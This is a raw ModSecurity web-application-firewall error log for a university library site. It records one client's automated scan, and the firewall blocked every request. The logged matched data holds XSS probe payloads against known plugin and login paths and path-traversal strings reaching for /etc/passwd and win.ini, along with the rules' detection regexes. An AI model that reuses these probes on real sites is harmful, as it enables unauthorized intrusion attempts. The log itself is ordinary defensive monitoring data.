[Tue Aug 29 11:56:10.580401 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:backurl: 1 onmouseover=alert(/document.domain/) y="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/plugins/template/login.php"] [unique_id "ZO16asCo-f0AAAq@sg8AAAAM"]
[Tue Aug 29 11:56:10.592515 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/wp-symposium/get_album_item.php"] [unique_id "ZO16asCo-f0AAApa-UIAAAAg"]
[Tue Aug 29 11:56:11.581523 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:returnTo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:returnTo: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/login.html"] [unique_id "ZO16a8Co-f0AAApa-UQAAAAg"]
[Tue Aug 29 11:56:11.654706 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/login/"] [unique_id "ZO16a8Co-f0AAArB1yMAAAAV"]
[Tue Aug 29 11:56:12.534953 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO16bMCo-f0AAArB1yUAAAAV"]
[Tue Aug 29 11:56:12.556795 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:urll. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:urll: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/r2w/signIn.do"] [unique_id "ZO16bMCo-f0AAAqY6SwAAAAr"]
[Tue Aug 29 11:56:13.624444 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:UID: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/ie50/system/login/SysLoginUser.aspx"] [unique_id "ZO16bcCo-f0AAAqeFlYAAAAx"]
[Tue Aug 29 11:56:14.594455 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16bsCo-f0AAAqeFlgAAAAx"]
[Tue Aug 29 11:56:14.921455 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:UID: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/system/login/SysLoginUser.aspx"] [unique_id "ZO16bsCo-f0AAAocyfUAAAAR"]
[Tue Aug 29 11:56:15.584505 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:aoid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:aoid: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php"] [unique_id "ZO16b8Co-f0AAAocyfwAAAAR"]
[Tue Aug 29 11:56:16.927931 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/kindeditor/php/demo.php"] [unique_id "ZO16cMCo-f0AAAqeFl8AAAAx"]
[Tue Aug 29 11:56:17.181677 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:serviceestimatekey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:serviceestimatekey: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/car1/estimateresult/result"] [unique_id "ZO16ccCo-f0AAAq5@OwAAAAK"]
[Tue Aug 29 11:56:17.567358 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/php/demo.php"] [unique_id "ZO16ccCo-f0AAApXguEAAAAU"]
[Tue Aug 29 11:56:18.861175 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16csCo-f0AAApXguUAAAAU"]
[Tue Aug 29 11:56:19.540715 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ver. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ver: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php"] [unique_id "ZO16c8Co-f0AAAq@sj4AAAAM"]
[Tue Aug 29 11:56:21.772514 2023] [:error] [pid 2761] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dcCo-f0AAArJXkIAAAAZ"]
[Tue Aug 29 11:56:21.811008 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:section: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dcCo-f0AAArIARwAAAAX"]
[Tue Aug 29 11:56:22.538726 2023] [:error] [pid 2764] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dsCo-f0AAArMmo8AAAAf"]
[Tue Aug 29 11:56:23.528799 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22\\x22  found within ARGS:message: <img src=\\x22\\x22 onerror=\\x22alert(1);\\x22>1</img>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/Pacs/login.php"] [unique_id "ZO16d8Co-f0AAAq-HaIAAAAT"]
[Tue Aug 29 11:56:23.669551 2023] [:error] [pid 2761] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:searchTerm: x' alert(1) 'x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16d8Co-f0AAArJXmAAAAAZ"]
[Tue Aug 29 11:56:24.838584 2023] [:error] [pid 2761] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ),// found within ARGS:searchTerm: x\\x5c' alert(1),//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16eMCo-f0AAArJXm0AAAAZ"]
[Tue Aug 29 11:56:25.609206 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:redirect_to: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16ecCo-f0AAArLLd0AAAAb"]
[Tue Aug 29 11:56:27.026893 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:referer. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:referer: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/src/login.php"] [unique_id "ZO16e8Co-f0AAAqSw70AAAAN"]
[Tue Aug 29 11:56:29.835757 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class_key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:class_key: ../../../../../../../../../../windows/win.ini\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/manager/controllers/default/resource/tvs.php"] [unique_id "ZO16fcCo-f0AAAq5@RYAAAAK"]
[Tue Aug 29 11:56:30.589673 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:page: \\x22/></script><script>alert(document.domain)</script><b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php"] [unique_id "ZO16fsCo-f0AAAq@slQAAAAM"]
[Tue Aug 29 11:56:30.605469 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/php/ssh_form.php"] [unique_id "ZO16fsCo-f0AAAoAlCAAAAAC"]
[Tue Aug 29 11:56:32.906499 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "172.28.0.1_4c417fa93f05a6c1142d086a2b81f21f44682fb3"): Internal error [hostname "digilibfkip.unla.ac.id"] [uri "/embed.js"] [unique_id "ZO16gMCo-f0AAAolK2oAAAAe"]
[Tue Aug 29 11:56:33.619359 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:a</script><script>alert(/XSS/)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:a</script><script>alert(/XSS/)</script>: a</script><script>alert(/XSS/)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/aa404bb"] [unique_id "ZO16gcCo-f0AAArB12IAAAAV"]
